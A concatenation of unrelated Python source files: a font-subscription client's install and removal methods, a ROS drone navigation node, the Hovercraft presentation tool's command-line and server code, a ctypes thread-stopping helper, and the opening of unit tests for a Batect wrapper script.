def installedFontVersion(self, fontID=None, font=None):
try:
folder = self.parent.folder()
if fontID and not font:
font = self.fontByID(fontID)
for version in font.getVersions():
path = os.path.join(folder, self.uniqueID() + "-" + font.filename(version.number))
if os.path.exists(path):
return version.number
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
# def fontIsOutdated(self, fontID):
# success, installabeFontsCommand = self.protocol.installableFontsCommand()
# for foundry in installabeFontsCommand.foundries:
# for family in foundry.families:
# for font in family.fonts:
# if font.uniqueID == fontID:
# installedVersion = self.installedFontVersion(fontID)
# return installedVersion and installedVersion != font.getVersions()[-1].number
def removeFonts(self, fontIDs, dryRun=False, updateSubscription=True):
try:
success, installableFontsCommand = self.protocol.installableFontsCommand()
uninstallTheseProtectedFontIDs = []
uninstallTheseUnprotectedFontIDs = []
folder = self.parent.folder()
for fontID in fontIDs:
path = None
font = self.fontByID(fontID)
installedFontVersion = self.installedFontVersion(font=font)
if installedFontVersion:
path = os.path.join(
folder,
self.uniqueID() + "-" + font.filename(installedFontVersion),
)
if not path and not dryRun:
return False, "Font path couldn’t be determined (preflight)"
if font.protected:
self.parent.parent.delegate._fontWillUninstall(font)
# Test for permissions here
if not dryRun:
try:
if self.parent.parent.testScenario == "simulatePermissionError":
raise PermissionError
else:
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
f = open(path + ".test", "w")
f.write("test")
f.close()
os.remove(path + ".test")
except PermissionError:
self.parent.parent.delegate._fontHasInstalled(
False,
"Insufficient permission to uninstall font.",
font,
)
return False, "Insufficient permission to uninstall font."
assert os.path.exists(path + ".test") is False
uninstallTheseProtectedFontIDs.append(fontID)
else:
uninstallTheseUnprotectedFontIDs.append(fontID)
assert self.parent.parent == self.protocol.client
assert self.parent.parent.testScenario == self.protocol.client.testScenario
# Server access
# Protected fonts
if uninstallTheseProtectedFontIDs:
success, payload = self.protocol.removeFonts(
uninstallTheseProtectedFontIDs,
updateSubscription=updateSubscription,
)
font = None
if success:
# # Security check
# if set([x.uniqueID for x in payload.assets]) - set(fontIDs) or
# set(fontIDs) - set([x.uniqueID for x in payload.assets]):
# return False, 'Incoming fonts’ uniqueIDs mismatch with requested
# font IDs.'
if len(payload.assets) == 0:
return (
False,
f"No fonts to uninstall in .assets, expected {len(uninstallTheseProtectedFontIDs)} assets",
)
# Process fonts
for incomingFont in payload.assets:
if incomingFont.uniqueID in fontIDs:
proceed = ["unknownInstallation", "unknownFont"] #
if incomingFont.response in proceed:
pass
# Predefined response messages
elif incomingFont.response != "error" and incomingFont.response != "success":
return (
False,
[
"#(response.%s)" % incomingFont.response,
"#(response.%s.headline)" % incomingFont.response,
],
)
elif incomingFont.response == "error":
return False, incomingFont.errorMessage
if incomingFont.response == "success":
path = None
font = self.fontByID(incomingFont.uniqueID)
installedFontVersion = self.installedFontVersion(font=font)
if installedFontVersion:
path = os.path.join(
folder,
self.uniqueID() + "-" + font.filename(installedFontVersion),
)
if self.parent.parent.testScenario == "simulateNoPath":
path = None
if not path and not dryRun:
return (
False,
"Font path couldn’t be determined (deleting unprotected fonts)",
)
if not dryRun:
os.remove(path)
self.parent.parent.delegate._fontHasUninstalled(True, None, font)
else:
self.parent.parent.delegate._fontHasUninstalled(False, payload, font)
return False, payload
# Unprotected fonts
if uninstallTheseUnprotectedFontIDs:
for fontID in uninstallTheseUnprotectedFontIDs:
path = None
font = self.fontByID(fontID)
installedFontVersion = self.installedFontVersion(font=font)
if installedFontVersion:
path = os.path.join(
folder,
self.uniqueID() + "-" + font.filename(installedFontVersion),
)
if self.parent.parent.testScenario == "simulateNoPath":
path = None
if not path and not dryRun:
return (
False,
"Font path couldn’t be determined (deleting unprotected fonts)",
)
if not dryRun:
os.remove(path)
self.parent.parent.delegate._fontHasUninstalled(True, None, font)
return True, None
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def installFonts(self, fonts):
try:
# Terms of Service
if self.get("acceptedTermsOfService") is not True:
return (
False,
[
"#(response.termsOfServiceNotAccepted)",
"#(response.termsOfServiceNotAccepted.headline)",
],
)
success, installabeFontsCommand = self.protocol.installableFontsCommand()
installTheseFontIDs = []
protectedFonts = False
versionByFont = {}
folder = self.parent.folder()
fontIDs = []
for fontID, version in fonts:
fontIDs.append(fontID)
versionByFont[fontID] = version
path = None
font = self.fontByID(fontID)
path = os.path.join(folder, self.uniqueID() + "-" + font.filename(version))
if font.protected or font.expiry or font.expiryDuration:
protectedFonts = True
assert path
assert font
self.parent.parent.delegate._fontWillInstall(font)
# Test for permissions here
try:
if self.parent.parent.testScenario == "simulatePermissionError":
raise PermissionError
else:
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
f = open(path + ".test", "w")
f.write("test")
f.close()
os.remove(path + ".test")
except PermissionError:
self.parent.parent.delegate._fontHasInstalled(
False, "Insufficient permission to install font.", font
)
return False, "Insufficient permission to install font."
assert os.path.exists(path + ".test") is False
installTheseFontIDs.append(fontID)
# Server access
success, payload = self.protocol.installFonts(fonts, updateSubscription=protectedFonts)
font = None
if success:
# Check for empty assets
if len(payload.assets) == 0:
return (
False,
f"No fonts to install in .assets, expected {len(installTheseFontIDs)} assets",
)
# Check if all requested fonts and fontVersions
# are present in the assets
for fontID, version in fonts:
if not [fontID, version] in [[x.uniqueID, x.version] for x in payload.assets]:
return (
False,
f"Font {fontID} with version {version} not found in assets",
)
# Process fonts
for incomingFont in payload.assets:
if incomingFont.uniqueID in fontIDs:
if incomingFont.response == "error":
return False, incomingFont.errorMessage
# Predefined response messages
elif incomingFont.response != "error" and incomingFont.response != "success":
return (
False,
[
"#(response.%s)" % incomingFont.response,
"#(response.%s.headline)" % incomingFont.response,
],
)
if incomingFont.response == "success":
path = None
font = self.fontByID(incomingFont.uniqueID)
path = os.path.join(
folder,
self.uniqueID() + "-" + font.filename(versionByFont[incomingFont.uniqueID]),
)
assert path
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
if incomingFont.data and incomingFont.encoding:
f = open(path, "wb")
f.write(base64.b64decode(incomingFont.data))
f.close()
elif incomingFont.dataURL:
(
success,
response,
responseObject,
) = self.parent.parent.performRequest(incomingFont.dataURL, method="GET")
if not success:
return False, response
else:
f = open(path, "wb")
f.write(response)
f.close()
self.parent.parent.delegate._fontHasInstalled(True, None, font)
# Ping
self.stillAlive()
return True, None
else:
self.parent.parent.delegate._fontHasInstalled(False, payload, font)
return False, payload
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def update(self):
try:
self.parent._updatingSubscriptions.append(self.url)
if self.parent.parent.online(self.protocol.url.restDomain.split("/")[0]):
self.parent.parent.delegate._subscriptionWillUpdate(self)
self.stillAlive()
success, message, changes = self.protocol.update()
if self.url in self.parent._updatingSubscriptions:
self.parent._updatingSubscriptions.remove(self.url)
self._updatingProblem = None
self.parent.parent._subscriptionsUpdated.append(self.url)
if not success:
self.parent.parent.delegate._subscriptionHasBeenUpdated(self, success, message, changes)
return success, message, changes
if changes:
self.save()
# Success
self.parent.parent.delegate._subscriptionHasBeenUpdated(self, True, None, changes)
return True, None, changes
else:
self.parent._updatingSubscriptions.remove(self.url)
self.parent.parent._subscriptionsUpdated.append(self.url)
self._updatingProblem = [
"#(response.serverNotReachable)",
"#(response.serverNotReachable.headline)",
]
self.parent.parent.delegate._subscriptionHasBeenUpdated(self, False, self._updatingProblem, False)
return False, self._updatingProblem, False
except Exception as e: # nocoverage
success, message = self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
return False, message, False
def updatingProblem(self):
try:
return self._updatingProblem
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def get(self, key):
try:
preferences = dict(self.parent.parent.get("subscription(%s)" % self.protocol.unsecretURL()) or {})
if key in preferences:
o = preferences[key]
if "Array" in o.__class__.__name__:
o = list(o)
elif "Dictionary" in o.__class__.__name__:
o = dict(o)
return o
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def set(self, key, value):
try:
preferences = dict(self.parent.parent.get("subscription(%s)" % self.protocol.unsecretURL()) or {})
preferences[key] = value
self.parent.parent.set("subscription(%s)" % self.protocol.unsecretURL(), preferences)
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def remove(self, key):
try:
preferences = dict(self.parent.parent.get("subscription(%s)" % self.protocol.unsecretURL()) or {})
if key in preferences:
del preferences[key]
self.parent.parent.set("subscription(%s)" % self.protocol.unsecretURL(), preferences)
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def save(self):
try:
subscriptions = self.parent.get("subscriptions") or []
if not self.protocol.unsecretURL() in subscriptions:
subscriptions.append(self.protocol.unsecretURL())
self.parent.set("subscriptions", subscriptions)
self.protocol.save()
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def delete(self, calledFromParent=False, remotely=False):
try:
success, installabeFontsCommand = self.protocol.installableFontsCommand()
# Delete all fonts
for foundry in installabeFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
self.removeFonts([font.uniqueID])
# Key
try:
self.protocol.deleteSecretKey()
except Exception:
pass
# ZMQ
self.parent.parent.unregisterZMQCallback(self.zmqTopic())
# Resources
self.parent.parent.delegate._subscriptionWillDelete(self)
self.parent.parent.remove("subscription(%s)" % self.protocol.unsecretURL())
# Subscriptions
subscriptions = self.parent.get("subscriptions") or []
subscriptions.remove(self.protocol.unsecretURL())
self.parent.set("subscriptions", subscriptions)
self.parent._subscriptions = {}
# # currentSubscription
# if self.parent.get('currentSubscription') == self.protocol.unsecretURL():
# if len(subscriptions) >= 1:
# self.parent.set('currentSubscription', subscriptions[0])
self.parent._subscriptions = {}
if len(subscriptions) == 0 and calledFromParent is False:
self.parent.delete(calledFromSubscription=True)
self.parent.parent.delegate._subscriptionHasBeenDeleted(
self, withinPublisherDeletion=calledFromParent, remotely=remotely
)
self.parent.parent.manageMessageQueueConnection()
if not remotely and not calledFromParent:
self.parent.parent.uploadSubscriptions()
return True, None
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def files(self):
"Returns list of all resource URLs that the subscription may have loaded"
files = []
# Endpoint
success, endpointCommand = self.protocol.endpointCommand()
if success:
if endpointCommand.logoURL:
files.append(endpointCommand.logoURL)
# Installable Fonts
success, installableFontsCommand = self.protocol.installableFontsCommand()
if success:
for foundry in installableFontsCommand.foundries:
# styling
for theme in foundry.styling:
if "logoURL" in foundry.styling[theme]:
files.append(foundry.styling[theme]["logoURL"])
for family in foundry.families:
for url in family.billboardURLs:
files.append(url)
for font in family.fonts:
for url in font.billboardURLs:
files.append(url)
return list(set(files))
|
Navigator_rs_tx2.py
|
#encoding=utf-8
'''
project overview:
Subscribe:
1.slam pose(global/local pose) *
2.octomap_server/global map
3.local pointcloud/local octomap
4.target input(semantic target/visual pose target/gps target)
Publish:
1.Mavros(amo) Command
2.Navigator status
Algorithms:
1.D*
2.state transfer
3.position->position PID controller
4.global/semantic/visual target to local pose
'''
import threading
import time
from path_optimization.path_pruning import PathPruning
# for ros
import rospy
from geometry_msgs.msg import PoseStamped, Twist
from std_msgs.msg import Float32, String
from sensor_msgs.msg import Imu, NavSatFix, PointCloud, PointCloud2
import sensor_msgs.point_cloud2 as pc2
from visualization_msgs.msg import Marker,MarkerArray
# for mavros
from mavros_msgs.msg import GlobalPositionTarget, State, PositionTarget#, Command
from mavros_msgs.srv import CommandBool, SetMode
# for octomap
from octomap_msgs.msg import Octomap, OctomapWithPose, octomap_msgs
from helper import save_points3D, load_points3D
# other useful utilities
#from pyquaternion import Quaternion
import pyquaternion
import astar.astar
import astar.driver
import time
import math
from enum import Enum
import thread
#from queue import Queue
#from Pos2PosController import Pos2PosController as Controller # TODO:re-implement this.
from SimController import Controller as Controller
import DiscreteGridUtils
import numpy as np
from RandomSampling.randomsampling import randomsampling
# define system status
class status(Enum):
INITIALIZED = 1
LOOKING_FOR_PATH = 2
LOOKING_FOR_PATH_SUCCEED = 3
LOOKING_FOR_PATH_FAILED = 4
GOING_TO_TARGET = 5
GOING_TO_VISION_TARGET = 6
class Navigator:
def __init__(self, save_pts=False, config_file_path=None):
if config_file_path:
pass
rospy.init_node("gi_navigator_node")
self.dg = DiscreteGridUtils.DiscreteGridUtils(grid_size=0.1) # modify grid size according to different purposes
self.rate = rospy.Rate(50)
self.driver = astar.driver.Driver()
self.controller = Controller()
self.mavros_state = "OFFBOARD"
self.set_status(status.INITIALIZED)
self.save_pts = save_pts
self.cur_command_id = 0
self.prev_command_id = 0
self.cur_target_position = None
self.task_id = -1
self.obstacle_set_mutex = threading.Lock() # mutex.acquire(timeout);mutex.release()
self.nav_command_mutex = threading.Lock() # for nav command in dstar and ros high level command.
self.local_pose_d = None
self.local_pose_c = None
self.navigator_status_pub = rospy.Publisher('/gi/navigator_status', String, queue_size=10)
self.path_plan_pub = rospy.Publisher('/gi/navi_path_plan', MarkerArray, queue_size=10)
self.path = []
self.path_prune = PathPruning(obstacle_distance=12)
self.rs = randomsampling()
t1 = threading.Thread(target=self.ros_thread)
t1.start()
'''
+Z +Z ^ +Y
^ ^ /
| | /
| |/
+X <------0 convert to 0------> +X
/
/
/
+Y
(PX4 frame) (Gazebo frame)
'''
def path_in_gazebo_frame_to_enu_frame(self, gazebo_path):
enu_frame_path = []
for gazebo_path_point in gazebo_path:
enu_frame_path_point = [0, 0, 0]
enu_frame_path_point[0] = - gazebo_path_point[0]
enu_frame_path_point[1] = - gazebo_path_point[1]
enu_frame_path_point[2] = gazebo_path_point[2]
enu_frame_path.append(enu_frame_path_point)
return enu_frame_path
'''
Navigating thread
'''
def keep_navigating(self):
while self.mavros_state == "OFFBOARD" and not (rospy.is_shutdown()):
# get target position and local position in discrete
current_pos = self.get_local_pose_d()
end_pos = self.get_latest_target()
if current_pos is None:
print('current pose not valid!')
time.sleep(0.5)
continue
while not self.reachTargetPositionDiscrete(end_pos, 4) \
and (not self.navi_task_terminated()) \
and (not rospy.is_shutdown()): # Till task is finished:
print('From ', self.get_local_pose_d())
# This is the place where you modify path planner
t1 = time.time()
self.set_status(status.LOOKING_FOR_PATH)
print("start and end are: ", self.get_local_pose_d(), end_pos)
temp_obs = self.driver.get_obstacles_around()
if(temp_obs is not None):
_, self.path = self.rs.find_path(pose_d=self.get_local_pose_d(), target_pose_d=end_pos, obstacle_3d=temp_obs)
t2 = time.time()
print('random sampling path finding time cost:', (t2 - t1))
if not self.path:
self.set_status(status.LOOKING_FOR_PATH_SUCCEED)
print('No path found!, self.path is None')
time.sleep(0.05)
else:
# Path found. keep state machine and do task step by step.
print("Path found!")
# in the practical, transform path in FLU frame to ENU frame
print "self.path before: ", self.path
self.path = self.path_in_gazebo_frame_to_enu_frame(self.path)
print "self.path after: ", self.path
self.publish_path(self.path, (1, 0, 0))
# save obstacle points
if (self.save_pts):
self.driver.get_obstacles_around()
# going through each waypoint
for next_move in self.path:
if self.navi_task_terminated():
break
print('next_move : ', next_move)
# if not self.driver.algo.is_valid(next_move, self.driver.get_obstacles_around()):
# print('Next waypoint is in collision with obstacle, path not valid!')
# break
next_position_continuous = self.dg.discrete_to_continuous_target(next_move)
print("local pose: ", self.local_pose_c)
print("target pose: ", next_position_continuous)
while not self.reachTargetPositionContinuous(next_position_continuous, 0.5):
self.controller.mav_move(next_position_continuous[0],
next_position_continuous[1],
next_position_continuous[2],
abs_mode=True)
time.sleep(0.05)
print("Target Reached!")
time.sleep(0.05) # wait for new nav task.
print("Mavros not in OFFBOARD mode, Disconnected!")
'''
move quad in body frame
'''
def terminate_navigating(self):
#TODO
pass
def resume_navigating(self):
#TODO
pass
def set_target_position(self, target_position):
if target_position and len(target_position) is 3:
self.cur_target_position = self.dg.continuous_to_discrete(target_position)
def get_latest_target(self):
return self.cur_target_position
def set_vision_target(self, vision_target):
self.set_status(status.GOING_TO_VISION_TARGET)
self.set_target_position(vision_target)
def navi_task_terminated(self):
if self.dist(self.local_pose_d, self.cur_target_position) < 2: #TODO: or stop flag is set.
return True
else:
return False
'''
Dstar Thread
def Dstar_thread(self):
while not rospy.is_shutdown():
while status!= xxx:# TODO
next_move = xxx
return next_move'''
'''##For test:
target = [0.5, 0.5, 0.5]
self.set_target_postion(target)
pass'''
'''
ROS thread
responsible for subscribers and publishers
'''
def ros_thread(self):
print('ros_thread spawn!!!!')
self.octomap_msg = None
# subscribers
self.slam_sub = rospy.Subscriber("/gi/slam_output/pose", PoseStamped, self.slam_pose_callback)
self.vision_target_sub = rospy.Subscriber("/gi/visual_target/pose", PoseStamped, self.vision_target_callback)
self.point_cloud_sub = rospy.Subscriber("/camera/left/point_cloud", PointCloud, self.point_cloud_callback)
self.octomap_cells_vis = rospy.Subscriber("/octomap_point_cloud_centers", PointCloud2, self.octomap_update_callback)
self.local_pose_sub = rospy.Subscriber("/mavros/local_position/pose", PoseStamped, self.local_pose_callback)
self.mavros_sub = rospy.Subscriber("/mavros/state", State, self.mavros_state_callback)
# publishers
#self.mavros_control_pub = rospy.Publisher('mavros/Command', Command, queue_size=10)
self.set_status(status.INITIALIZED)
rospy.spin()
'''
ROS callbacks
'''
def slam_pose_callback(self, msg):
self.slam_pose = msg
def vision_target_callback(self, msg):
self.vision_target = msg
#print("Received New Vision Target!")
def mavros_state_callback(self, msg):
self.mavros_state = msg.mode
self.navigator_status_pub.publish(self.STATUS)
def point_cloud_callback(self, msg):
self.current_point_cloud = msg
def octomap_update_callback(self, msg): # as pointcloud2.
obs_set = set()
for p in pc2.read_points(msg, field_names=("x", "y", "z"), skip_nans=True):
#print " x : %f y: %f z: %f" % (p[0], p[1], p[2])
point = self.dg.continuous_to_discrete((p[0], p[1], p[2]))
#print("corresponding discrete value: ", point)
obs_set.add(point)
acquired = self.obstacle_set_mutex.acquire(True) # blocking.
if acquired:
#print('octomap updated!')
self.driver.set_obstacle_set(obs_set)
self.obstacle_set_mutex.release()
return
else:
print('Lock not acquired!')
def local_pose_callback(self, msg):
pose_ = msg.pose.position #TODO:do fusion with visual slam.
self.local_pose_c = (pose_.x, pose_.y, pose_.z)
self.local_pose_d = self.dg.continuous_to_discrete((pose_.x, pose_.y, pose_.z))
# return pose in discrete
def get_local_pose_d(self): # in mavros axis.for command.
return self.local_pose_d
# return pose in continuous
def get_local_pose_c(self):
return self.local_pose_c
'''
helper functions
'''
def set_status(self, status):
self.STATUS = String(status.name)
def dist(sefl, pos1, pos2):
if not pos1 or not pos2:
return False, 0
else:
return True, reduce(lambda x, y: x + y, map(lambda i: (pos1[i] - pos2[i]) ** 2, [0, 1, 2]))
# target should be Continuous
def reachTargetPositionContinuous(self, target, threshold=0.7):
delta_x = math.fabs(self.local_pose_c[0] - target[0])
delta_y = math.fabs(self.local_pose_c[1] - target[1])
delta_z = math.fabs(self.local_pose_c[2] - target[2])
distance = (delta_x + delta_y + delta_z)
print("distance: ", distance, "threshold: ", threshold)
if distance < threshold:
return True
else:
return False
# target should be discrete
def reachTargetPositionDiscrete(self, target, threshold=3):
delta_x = math.fabs(self.local_pose_d[0] - target[0])
delta_y = math.fabs(self.local_pose_d[1] - target[1])
delta_z = math.fabs(self.local_pose_d[2] - target[2])
distance = (delta_x + delta_y + delta_z)
print("distance: ", distance, "threshold: ", threshold)
if distance < threshold:
return True
else:
return False
def setMavMode(self, msg):
pass
def do_hover(self):
pass
def publish_path(self, path, RGB=(1, 0, 0)):
m_arr = MarkerArray()
marr_index = 0
for next_move in path:
print "publish_path, path len: ", len(path), next_move
point = self.dg.discrete_to_continuous_target((next_move[0], next_move[1], next_move[2]))
mk = Marker()
mk.header.frame_id = "map"
mk.action = mk.ADD
mk.id = marr_index
marr_index += 1
mk.color.r = RGB[0]
mk.color.g = RGB[1]
mk.color.b = RGB[2]
mk.color.a = 1.0
mk.type = mk.CUBE
mk.scale.x = 0.3
mk.scale.y = 0.3
mk.scale.z = 0.3
mk.pose.position.x = point[0]
mk.pose.position.y = point[1]
mk.pose.position.z = point[2]
m_arr.markers.append(mk)
self.path_plan_pub.publish(m_arr)
if __name__ == '__main__':
nav = Navigator(True)
# target position should be of size meter
nav.set_target_position((0, -3, 1))
nav.keep_navigating()
|
__init__.py
|
import argparse
import gettext
import os
import threading
import time
import pkg_resources
from collections import defaultdict
from http.server import HTTPServer, SimpleHTTPRequestHandler
from tempfile import TemporaryDirectory
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from .generate import generate
__version__ = pkg_resources.require("hovercraft")[0].version
class HovercraftEventHandler(FileSystemEventHandler):
def __init__(self, filelist):
self.filelist = filelist
self.quit = False
super().__init__()
def on_modified(self, event):
self._update(event.src_path)
def on_created(self, event):
self._update(event.src_path)
def on_moved(self, event):
self._update(event.dest_path)
def _update(self, src_path):
if self.quit:
return
if src_path in self.filelist:
print("File %s modified, update presentation" % src_path)
self.quit = True
def generate_and_observe(args, event):
while event.isSet():
# Generate the presentation
monitor_list = generate(args)
print("Presentation generated.")
# Make a list of involved directories
directories = defaultdict(list)
for file in monitor_list:
directory, filename = os.path.split(file)
directories[directory].append(filename)
observer = Observer()
handler = HovercraftEventHandler(monitor_list)
for directory, files in directories.items():
observer.schedule(handler, directory, recursive=False)
observer.start()
while event.wait(1):
time.sleep(0.05)
if handler.quit:
break
observer.stop()
observer.join()
def main(args=None):
parser = create_arg_parser()
args = parser.parse_args(args=args)
serve_presentation(args)
def create_arg_parser():
# That the argparse default strings are lowercase is ugly.
def my_gettext(s):
return s.capitalize()
gettext.gettext = my_gettext
parser = argparse.ArgumentParser(
description="Create impress.js presentations with reStructuredText",
add_help=False,
)
parser.add_argument(
"presentation",
metavar="<presentation>",
help="The path to the reStructuredText presentation file.",
)
parser.add_argument(
"targetdir",
metavar="<targetdir>",
nargs="?",
help=(
"The directory where the presentation is saved. Will be created "
"if it does not exist. If you do not specify a targetdir "
"Hovercraft! will instead start a webserver and serve the "
"presentation from that server."
),
)
parser.add_argument("-h", "--help", action="help", help="Show this help.")
parser.add_argument(
"-t",
"--template",
help=(
"Specify a template. Must be a .cfg file, or a directory with a "
"template.cfg file. If not given it will use a default template."
),
)
parser.add_argument(
"-c",
"--css",
help=(
"An additional css file for the presentation to use. "
"See also the ``:css:`` settings of the presentation."
),
)
parser.add_argument(
"-j",
"--js",
help=(
"An additional javascript file for the presentation to use. Added as a js-body script."
"See also the ``:js-body:`` settings of the presentation."
),
)
parser.add_argument(
"-a",
"--auto-console",
action="store_true",
help=(
"Open the presenter console automatically. This is useful when "
"you are rehearsing and making sure the presenter notes are "
"correct. You can also set this by having ``:auto-console: "
"true`` first in the presentation."
),
)
parser.add_argument(
"-s",
"--skip-help",
action="store_true",
help=("Do not show the initial help popup."),
)
parser.add_argument(
"-n",
"--skip-notes",
action="store_true",
help=("Do not include presenter notes in the output."),
)
parser.add_argument(
"-p",
"--port",
default="0.0.0.0:8000",
help=(
"The address and port that the server uses. "
"Ex 8080 or 127.0.0.1:9000. Defaults to 0.0.0.0:8000."
),
)
parser.add_argument(
"--mathjax",
default=os.environ.get(
"HOVERCRAFT_MATHJAX",
"https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML",
),
help=(
"The URL to the mathjax library."
" (It will only be used if you have rST ``math::`` in your document)"
),
)
parser.add_argument(
"-N",
"--slide-numbers",
action="store_true",
help=("Show slide numbers during the presentation."),
)
parser.add_argument(
"-v",
"--version",
action="version",
# help=('Display version and exit.'),
version="Hovercraft! %s" % __version__,
)
return parser
def serve_presentation(args):
# XXX Bit of a hack, clean this up, I check for this twice, also in the template.
if args.template and args.template not in ("simple", "default"):
args.template = os.path.abspath(args.template)
if args.targetdir:
# Generate the presentation
generate(args)
else:
# Server mode. Start a server that serves a temporary directory.
with TemporaryDirectory() as targetdir:
args.targetdir = targetdir
args.presentation = os.path.abspath(args.presentation)
# Set up watchdog to regenerate presentation if saved.
event = threading.Event()
event.set()
thread = threading.Thread(target=generate_and_observe, args=(args, event))
try:
# Serve presentation
if ":" in args.port:
bind, port = args.port.split(":")
else:
bind, port = "0.0.0.0", args.port
port = int(port)
# First create the server. This checks that we can connect to
# the port we want to.
os.chdir(targetdir)
server = HTTPServer((bind, port), SimpleHTTPRequestHandler)
print("Serving HTTP on", bind, "port", port, "...")
try:
# Now generate the presentation
thread.start()
try:
# All is good, start the server
server.serve_forever()
except KeyboardInterrupt:
print("\nKeyboard interrupt received, exiting.")
finally:
# Server exited
server.server_close()
finally:
# Stop the generation thread
event.clear()
# Wait for it to end
thread.join()
except PermissionError:
print("Can't bind to port %s:%s: No permission" % (bind, port))
except OSError as e:
if e.errno == 98:
print(
"Can't bind to port %s:%s: port already in use" % (bind, port)
)
else:
raise
|
kill_thread.py
|
import threading
import time
import inspect
import ctypes
__all__ = ['stop_thread']
def _async_raise(tid, exctype):
"""raises the exception, performs cleanup if needed"""
tid = ctypes.c_long(tid)
if not inspect.isclass(exctype):
exctype = type(exctype)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
tid, ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
def stop_thread(thread):
_async_raise(thread.ident, SystemExit)
def test():
while True:
print('-------')
time.sleep(0.5)
if __name__ == "__main__":
t = threading.Thread(target=test)
t.start()
time.sleep(5.2)
print("main thread sleep finish")
stop_thread(t)
|
tests.py
|
#! /usr/bin/env python3
import hashlib
import http.server
import os
import shutil
import socket
import subprocess
import tempfile
import threading
import unittest
class WrapperScriptTests(unittest.TestCase):
http_port = 8080
default_bash = "/usr/bin/bash"
minimum_script_dependencies = [
"/usr/bin/basename",
"/usr/bin/cut",
"/usr/bin/dirname",
"/usr/bin/grep",
"/usr/bin/head",
"/usr/bin/mkdir",
"/usr/bin/mktemp",
"/usr/bin/mv",
"/usr/bin/sed",
"/usr/bin/sha256sum",
"/usr/bin/uname",
]
minimum_script_dependencies_with_default_bash = minimum_script_dependencies + [default_bash]
def setUp(self):
self.start_server()
self.cache_dir = tempfile.mkdtemp()
def tearDown(self):
self.stop_server()
shutil.rmtree(self.cache_dir)
def download_url(self, path):
return "http://localhost:" + str(self.http_port) + "/test/" + path
def default_download_url(self):
return self.download_url("testapp.jar")
def test_first_run(self):
result = self.run_script(["arg 1", "arg 2"])
output = result.stdout.decode()
self.assertIn("Downloading Batect", output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), output)
self.assertIn("I received 2 arguments.\narg 1\narg 2\n", output)
self.assertEqual(result.returncode, 0)
def test_second_run(self):
first_result = self.run_script(["arg 1", "arg 2"])
first_output = first_result.stdout.decode()
self.assertIn("Downloading Batect", first_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), first_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), first_output)
self.assertIn("BATECT_WRAPPER_DID_DOWNLOAD is: true\n", first_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), first_output)
self.assertIn("I received 2 arguments.\narg 1\narg 2\n", first_output)
self.assertEqual(first_result.returncode, 0)
second_result = self.run_script(["arg 3", "arg 4"])
second_output = second_result.stdout.decode()
self.assertNotIn("Downloading Batect", second_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), second_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), second_output)
self.assertIn("BATECT_WRAPPER_DID_DOWNLOAD is: false\n", second_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), second_output)
self.assertIn("I received 2 arguments.\narg 3\narg 4\n", second_output)
self.assertEqual(first_result.returncode, 0)
def test_download_fails(self):
result = self.run_script(["arg 1", "arg 2"], download_url=self.download_url("does-not-exist"))
self.assertIn("Downloading Batect", result.stdout.decode())
self.assertIn("404 File not found", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_download_is_not_quiet(self):
result = self.run_script([], quiet_download="false")
result_output = result.stdout.decode()
self.assertIn("Downloading Batect", result_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), result_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), result_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), result_output)
self.assertIn("#", result_output)
self.assertEqual(result.returncode, 0)
def test_download_is_quiet(self):
result = self.run_script([], quiet_download="true")
result_output = result.stdout.decode()
self.assertNotIn("Downloading Batect", result_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), result_output)
